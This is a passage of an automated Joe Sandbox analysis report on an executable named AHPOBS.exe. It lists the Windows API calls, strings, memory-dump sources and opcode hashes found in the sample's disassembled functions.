                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                      • API String ID: 0-1603158881
                                      • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                      • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                      • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                      • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                      APIs
                                      • CreateMenu.USER32 ref: 00448603
                                      • SetMenu.USER32(?,00000000), ref: 00448613
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                      • IsMenu.USER32(?), ref: 004486AB
                                      • CreatePopupMenu.USER32 ref: 004486B5
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                      • DrawMenuBar.USER32 ref: 004486F5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                      • String ID: 0
                                      • API String ID: 161812096-4108050209
                                      • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                      • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                      • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                      • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\AppData\Local\Temp\AHPOBS.exe), ref: 00434057
                                      • LoadStringW.USER32(00000000), ref: 00434060
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                      • LoadStringW.USER32(00000000), ref: 00434078
                                      • _wprintf.LIBCMT ref: 004340A1
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                      • C:\Users\user\AppData\Local\Temp\AHPOBS.exe, xrefs: 00434040
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Local\Temp\AHPOBS.exe
                                      • API String ID: 3648134473-2340807463
                                      • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                      • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                      • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                      • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3bc997797cbc56cb26591c8448e390fdf0d1bbe08c8f9b91b28c5433c1dd3e93
                                      • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                      • Opcode Fuzzy Hash: 3bc997797cbc56cb26591c8448e390fdf0d1bbe08c8f9b91b28c5433c1dd3e93
                                      • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                      • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                      • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                      • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                      APIs
                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,0040F545,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,004A90E8,C:\Users\user\AppData\Local\Temp\AHPOBS.exe,?,0040F545), ref: 0041013C
                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                      • MoveFileW.KERNEL32(?,?), ref: 00453932
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                      • String ID:
                                      • API String ID: 978794511-0
                                      • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                      • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                      • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                      • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                      • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                      • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                      • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                      • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                      • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                      • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove$_memcmp
                                      • String ID: '$\$h
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                      • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                      • VariantClear.OLEAUT32 ref: 0045EA6D
                                      • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                      • __swprintf.LIBCMT ref: 0045EC33
                                      • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                      Strings
                                      • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                      Similarity
                                      • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                      • String ID: %4d%02d%02d%02d%02d%02d
                                      APIs
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                      • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                      Strings
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                      • String ID: @COM_EVENTOBJ
                                      APIs
                                      • VariantClear.OLEAUT32(?), ref: 0047031B
                                      • VariantClear.OLEAUT32(?), ref: 0047044F
                                      • VariantInit.OLEAUT32(?), ref: 004704A3
                                      • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                      • VariantClear.OLEAUT32(?), ref: 00470516
                                        • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                      • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                        • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                      • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                      Strings
                                      Similarity
                                      • API ID: Variant$Clear$Copy$CallDispFuncInit
                                      • String ID: H
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Strings
                                      Similarity
                                      • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                      • String ID:
                                      APIs
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                      • VariantClear.OLEAUT32(?), ref: 00435320
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                      • VariantClear.OLEAUT32(?), ref: 004353B3
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                      Strings
                                      Similarity
                                      • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                      • String ID: crts
                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                      • __lock.LIBCMT ref: 00417981
                                        • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                        • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                        • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                      • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                      • __lock.LIBCMT ref: 004179A2
                                      • ___addlocaleref.LIBCMT ref: 004179C0
                                      Strings
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL$pI
                                      APIs
                                      Similarity
                                      • API ID: _memmove$_malloc
                                      • String ID:
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                      • _memmove.LIBCMT ref: 0044B555
                                      • _memmove.LIBCMT ref: 0044B578
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                      • String ID:
                                      APIs
                                      • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                      • __calloc_crt.LIBCMT ref: 00415246
                                      • __getptd.LIBCMT ref: 00415253
                                      • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                      • _free.LIBCMT ref: 0041529E
                                      • __dosmaperr.LIBCMT ref: 004152A9
                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                      Similarity
                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                      • String ID:
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                      • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                      • gethostbyname.WSOCK32(?), ref: 004655A6
                                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                      • _memmove.LIBCMT ref: 004656CA
                                      • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                      • WSACleanup.WSOCK32 ref: 00465762
                                      Similarity
                                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                      • String ID:
                                      • API String ID: 2945290962-0
                                      • Opcode ID: 4795c790589efa9604366ab314be66f87df03ced37406f02fbff6eb4d423be89
                                      • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                      • Opcode Fuzzy Hash: 4795c790589efa9604366ab314be66f87df03ced37406f02fbff6eb4d423be89
                                      • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                      APIs
                                      • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                      • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                      • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                      • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                      • String ID:
                                      • API String ID: 1457242333-0
                                      • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                      • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                      • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                      • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ConnectRegistry_memmove_wcslen
                                      • String ID:
                                      • API String ID: 15295421-0
                                      • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                      • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                      • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                      • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • _wcstok.LIBCMT ref: 004675B2
                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                      • _wcscpy.LIBCMT ref: 00467641
                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                      • _wcslen.LIBCMT ref: 00467793
                                      • _wcslen.LIBCMT ref: 004677BD
                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                      • String ID: X
                                      • API String ID: 780548581-3081909835
                                      • Opcode ID: 66398beec43ac6de6e3bacdcf7465ee468cb7a280e343b0bfb8d6aa535c4b6dc
                                      • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                      • Opcode Fuzzy Hash: 66398beec43ac6de6e3bacdcf7465ee468cb7a280e343b0bfb8d6aa535c4b6dc
                                      • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                      • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                      • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                      • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                      • CloseFigure.GDI32(?), ref: 0044751F
                                      • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                      • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmp
